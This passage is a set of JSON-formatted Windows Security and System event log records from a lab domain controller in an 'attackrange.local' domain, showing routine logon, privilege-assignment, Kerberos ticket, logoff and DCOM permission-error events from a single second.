{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220298,"ProcessID":864,"ThreadID":988,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x45DFA\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{80FFBC81-7395-8B57-4499-E8ABB785839F}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\t::1\r\n\tSource Port:\t\t0\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-8400769$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x45dfa","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{80FFBC81-7395-8B57-4499-E8ABB785839F}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"::1","IpPort":"0","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 06:49:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220299,"ProcessID":864,"ThreadID":3032,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x46112\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x46112","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 06:49:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220300,"ProcessID":864,"ThreadID":3032,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x46112\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{80FFBC81-7395-8B57-4499-E8ABB785839F}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\t10.0.1.14\r\n\tSource Port:\t\t49708\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-8400769$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x46112","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{80FFBC81-7395-8B57-4499-E8ABB785839F}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"10.0.1.14","IpPort":"49708","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 06:49:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9187343239835811840,"EventType":"ERROR","SeverityValue":4,"Severity":"ERROR","EventID":10016,"SourceName":"Microsoft-Windows-DistributedCOM","ProviderGuid":"{1B562E86-B7AA-4131-BADC-B6F3A001407E}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76837,"ProcessID":992,"ThreadID":636,"Channel":"System","Domain":"ATTACKRANGE","AccountName":"Administrator","UserID":"S-1-5-21-634332812-1885290706-2582043485-500","AccountType":"User","Message":"The application-specific permission settings do not grant Local Activation permission for the COM Server application with CLSID \r\n{D63B10C5-BB46-4990-A94F-E40B9D520160}\r\n and APPID \r\n{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}\r\n to the user ATTACKRANGE\\Administrator SID (S-1-5-21-634332812-1885290706-2582043485-500) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.","Opcode":"Info","param1":"application-specific","param2":"Local","param3":"Activation","param4":"{D63B10C5-BB46-4990-A94F-E40B9D520160}","param5":"{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}","param6":"ATTACKRANGE","param7":"Administrator","param8":"S-1-5-21-634332812-1885290706-2582043485-500","param9":"LocalHost (Using LRPC)","param10":"Unavailable","param11":"Unavailable","EventReceivedTime":"2020-08-01 06:49:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220301,"ProcessID":864,"ThreadID":988,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-634332812-1885290706-2582043485-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-634332812-1885290706-2582043485-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-634332812-1885290706-2582043485-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 06:49:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220302,"ProcessID":864,"ThreadID":988,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{A9360B33-9209-DD73-0DC8-1BFC73D80BAD}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-8400769$\r\n\tService ID:\t\tS-1-5-21-634332812-1885290706-2582043485-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-8400769$","ServiceSid":"S-1-5-21-634332812-1885290706-2582043485-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{A9360B33-9209-DD73-0DC8-1BFC73D80BAD}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 06:49:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220303,"ProcessID":864,"ThreadID":988,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{A9360B33-9209-DD73-0DC8-1BFC73D80BAD}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x538\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{A9360B33-9209-DD73-0DC8-1BFC73D80BAD}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 06:49:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220304,"ProcessID":864,"ThreadID":988,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x46E01\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{A9360B33-9209-DD73-0DC8-1BFC73D80BAD}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x538\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-8400769\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x46e01","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-8400769","LogonGuid":"{A9360B33-9209-DD73-0DC8-1BFC73D80BAD}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 06:49:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220305,"ProcessID":864,"ThreadID":988,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x46E01\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x46e01","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 06:49:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220306,"ProcessID":864,"ThreadID":988,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x46112\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-8400769$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x46112","LogonType":"3","EventReceivedTime":"2020-08-01 06:49:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220307,"ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x45DFA\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-8400769$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x45dfa","LogonType":"3","EventReceivedTime":"2020-08-01 06:49:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220308,"ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x47324\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x47324","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 06:49:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220309,"ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x47324\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{80FFBC81-7395-8B57-4499-E8ABB785839F}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\t::1\r\n\tSource Port:\t\t0\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was 